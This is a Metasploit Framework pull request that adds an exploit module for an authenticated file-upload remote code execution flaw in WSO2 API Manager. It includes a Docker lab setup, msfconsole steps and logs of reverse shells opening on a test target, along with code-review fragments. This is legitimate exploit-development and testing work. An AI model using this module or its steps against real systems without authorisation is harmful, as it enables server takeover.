Added module for WSO2 API Manager Documentation File Upload Remote Co…
rapid7/metasploit-framework pull request #19647
Opened 2024-11-14 17:42 UTC by heyder

## Vulnerable Application

Closes #19646 

A vulnerability in the 'Add API Documentation' feature allows malicious users with specific permissions
(`/permission/admin/login` and `/permission/admin/manage/api/publish`) to upload arbitrary files to a user-controlled
server location. This flaw could be exploited to execute remote code, enabling an attacker to gain control over the server.

```yaml
services:
  api-manager:
    image: wso2/wso2am:4.0.0-alpine
    container_name: swo2_api_manager
    ports:
      - "9443:9443"

```

```bash
docker-compose up
```

## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use multi/http/wso2_api_manager_file_upload_rce`
1. Do: `set rhosts [ip]`
1. Do: `set lhost [ip]`
1. Do: `run`
1. You should get a shell.

## Scenarios

### WSO2 API Manager 4.0.0
```
msf6 exploit(multi/http/wso2_api_manager_file_upload_rce) > exploit

[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target...
[+] Authentication successful
[+] The target appears to be vulnerable. Detected WSO2 API Manager 4.0.0 which is vulnerable.
[+] Authentication successful
[*] Listing APIs...
[+] Document created successfully
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload... 
[+] Payload executed successfully
[*] Command shell session 2 opened (127.0.0.1:4444 -> 127.0.0.1:58206) at 2024-11-03 15:36:37 +0100

id
uid=802(wso2carbon) gid=802(wso2) groups=802(wso2)
pwd
/home/wso2carbon/wso2am-4.0.0
exit
[*] 127.0.0.1 - Command shell session 2 closed.
```

#### Manually setting up the wrong API version

```
msf6 exploit(multi/http/wso2_api_manager_file_upload_rce) > exploit 

[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target...
[+] Authentication successful
[-] Mismatch between version found (4.0.0) and module target version (WSO2 API Manager (4.2.0))
[+] The target appears to be vulnerable. Detected WSO2 API Manager 4.0.0 which is vulnerable.
[*] Listing products APIs...
[-] Exploit aborted due to failure: unexpected-reply: Failed to list APIs
[*] Exploit completed, but no session was created.
```

2024-11-15 09:43 UTC, jvoisin commented on modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb
> +      'uri' => normalize_uri(target_uri.path, '/services', '/Version'),
```suggestion
      'uri' => normalize_uri(target_uri.path, 'services', 'Version'),
```

2024-11-15 09:43 UTC, jvoisin commented on modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb
> +       version <= Rex::Version.new('3.1.0')
I don't think this is working, as it'll return `CheckCode::Safe` for any version above 4.2.0. You migjt want to use `version.between?(…)` instead.

2024-11-21 14:56 UTC, sjanusz-r7 commented on documentation/modules/exploit/multi/http/wso2_api_manager_file_upload_rce.md
> +### USERNAME (required)
Should this be `HttpUsername` based on this in the module: `OptString.new('HttpUsername', [true, 'WSO2 API manager username', 'admin']),`

2024-11-21 14:56 UTC, sjanusz-r7 commented on modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb
> +      Rex::Version.new('3.1.0'), Rex::Version.new('4.2.0')
```suggestion
      Rex::Version.new('3.1.0'), Rex::Version.new('4.2.9')
```

2024-11-21 14:56 UTC, sjanusz-r7 commented on modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb
> +        Rex::Version.new(target.opts['min_version']), Rex::Version.new(target.opts['max_version'])
Is the version check here meant to be inclusive or not? Is the `max_version` here still vulnerable or when the vulnerability has been patched?

2024-11-21 14:56 UTC, sjanusz-r7 commented on modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb
> +      print_error("Mismatch between version found (#{version}) and module target version (#{target.name})") unless version.between?(
```suggestion
      vprint_error("Mismatch between version found (#{version}) and module target version (#{target.name})") unless version.between?(
```

2024-11-21 14:56 UTC, sjanusz-r7 commented on modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb
> +      )
Should we return a CheckCode::Safe here if the version mismatch happens?
https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-write-a-check-method.html#check-codes

2024-11-21 14:56 UTC, sjanusz-r7 commented on modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb
> +      print_error('No Proucts API available')
```suggestion
      print_error('No Products API available')
```

2024-11-21 14:56 UTC, sjanusz-r7 commented on modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb
> +          'url' => "https://#{target_uri.host}:9443/am/#{Faker::Internet.slug}/v1/api/"
Should this use the RPORT datastore option?
```suggestion
          'url' => "https://#{target_uri.host}:#{datastore['RPORT']}/am/#{Faker::Internet.slug}/v1/api/"
```

2024-11-21 14:56 UTC, sjanusz-r7 commented on modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb
> +        'Platform' => %w[linux],
Would this also support `windows`?
The module is currently an `exploit/multi`, but only specifies `linux` as a valid platform.

2024-12-02 19:07 UTC, jheysel-r7 requested changes
Thanks for the module @heyder! It's looking good. I've got a couple suggestions. I wasn't able test it successfully the first time around. Please let me know if I've made a mistake with my testing attempt, I've included some logs below.

2024-12-02 19:07 UTC, jheysel-r7 commented on documentation/modules/exploit/multi/http/wso2_api_manager_file_upload_rce.md
> +
There seems to be some extra spacing here.
```suggestion

```

2024-12-02 19:07 UTC, jheysel-r7 commented on modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb
> +    print_good('Payload uploaded successfully')
```suggestion
    print_good('Payload uploaded successfully')
    register_file_for_cleanup(jsp_filename)
```

2024-12-04 18:38 UTC, heyder commented on modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb
> +        }
Sure, we could do it, but it doesn't really matter. It is just a fake API, which we'll use to add documentation to it.

2024-12-04 19:01 UTC, heyder commented on modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb
> +    fail_with(Failure::UnexpectedReply, 'Authentication attempt failed') unless bearer
@jheysel-r7 Thanks for the thorough troubleshooting and insights.

I pinpointed the issue: the application replays on a redirect with a full location URL, and it seems that `send_request_cgi` doesn't automatically account for this scenario.

As a takeaway, I'll remind myself to test directly without using a proxy first—Burp was handling that seamlessly, which masked the underlying problem during my tests.

Here’s the difference between the first and second requests that led me to this conclusion:

**First request:**

`GET /publisher/services/auth/login HTTP/1.1`


**Second request:**

`GET https://localhost:9443/oauth2/authorize?response_type=code&.... HTTP/1.1`



I’ve come up with a quick and dirty solution to address this issue, though I’m unsure if it meets the code quality standards. I’d love to hear any other ideas you might have!

2024-12-06 14:21 UTC, jheysel-r7 commented on modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb
> +    fail_with(Failure::UnexpectedReply, 'Authentication attempt failed') unless bearer
@heyder Thanks for implementing the fix and explaining what was going on. 

So `send_request_cgi` isn't designed to follow redirects when they occur but `send_request_cgi!` is and you can specify the redirect depth as needed. 

In this method the first redirect loop, loops once and the second one loops twice. So we should be able to replace the respective loops with:
```
res = send_request_cgi!(opts, 20, 1) # timeout and redirect_depth
res = send_request_cgi!(opts, 20, 2) # timeout and redirect_depth
```

However I ran into an issue while testing and I _think_  it's a bug in the `http_client.rb`. I've outlined it here:
https://github.com/rapid7/metasploit-framework/pull/19700.

I'll push my changes up so you can see what I've done. We can revert my change if need be.

2024-12-12 19:02 UTC, jheysel-r7 approved these changes
Thanks for the update @heyder. I've retested with the bug fix that's recently been landed and everything is good to go. https://github.com/rapid7/metasploit-framework/pull/19700 🚀 

```
msf6 exploit(multi/http/wso2_api_manager_file_upload_rce) > run

[*] Started reverse TCP handler on 172.16.199.158:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Authentication successful
[+] The target appears to be vulnerable. Detected WSO2 API Manager 4.0.0 which is vulnerable.
[+] Document created successfully
[*] Uploading payload...
[+] Payload uploaded successfully. File: YJ8y3ntidni5FjXb.jsp
[*] Executing payload...
[+] Payload executed successfully
[+] Deleted repository/deployment/server/webapps/authenticationendpoint/YJ8y3ntidni5FjXb.jsp
[*] Command shell session 1 opened (172.16.199.158:4444 -> 172.23.0.2:35776) at 2024-12-12 09:55:58 -0900

uname -a
Linux d8d7997d1a5a 5.15.0-125-generic #135~20.04.1-Ubuntu SMP Mon Oct 7 13:56:22 UTC 2024 x86_64 Linux
id
uid=802(wso2carbon) gid=802(wso2) groups=802(wso2)
```

2024-12-16 15:27 UTC, merged

2024-12-16 15:27 UTC, jheysel-r7 commented
# Release Notes
Adds an exploit module for a vulnerability in the 'Add API Documentation' feature of WSO2 API Manager and allows malicious users with specific permissions to upload arbitrary files to a user-controlled server location. This flaw allows for RCE on the target system.